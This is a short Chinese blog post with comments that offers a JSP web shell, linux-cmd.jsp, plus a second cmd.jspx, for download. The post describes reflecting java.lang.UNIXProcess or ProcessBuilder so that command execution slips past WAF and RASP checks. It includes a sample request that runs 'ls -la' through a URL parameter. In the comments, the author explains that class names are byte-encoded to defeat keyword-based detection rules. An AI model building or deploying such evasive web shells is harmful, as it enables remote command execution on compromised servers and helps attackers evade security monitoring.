一个绕Runtime、ProcessBuilder的linux-cmd.jsp

yzmm
2604 阅读

最近有人问怎么绕过ProcessBuilder的exec方法,所以就写了一个可以绕大部分WAF或者说RASP的jsp。原理很简单:直接反射java.lang.UNIXProcess类。

请求:http://localhost:8080/linux-cmd.jsp?str=ls -la

Windows版懒得写,会的朋友自己动手稍微改下就可以了。

下载地址:linux-cmd.jsp.zip


再发一个纯Java反射ProcessBuilder类的cmd.jspx,下载地址:cmd.jspx

评论 (3)

yzmm
用byte的原因是怕有人写的检测代码是直接提取的关键字,比如他的规则是提取一个jsp文件中如果包含Runtime关键字就直接拦截。
虾米
朋友 我的博客地址更新了 关键词:蜗居 URL地址: https://woj.app 望朋友看到更新一下呦。感谢。 好久没来了,路过踩一脚。
a
为什么需要把类型转为Byte再去转类型名称呢,直接写类型名称会有什么问题么?

发表评论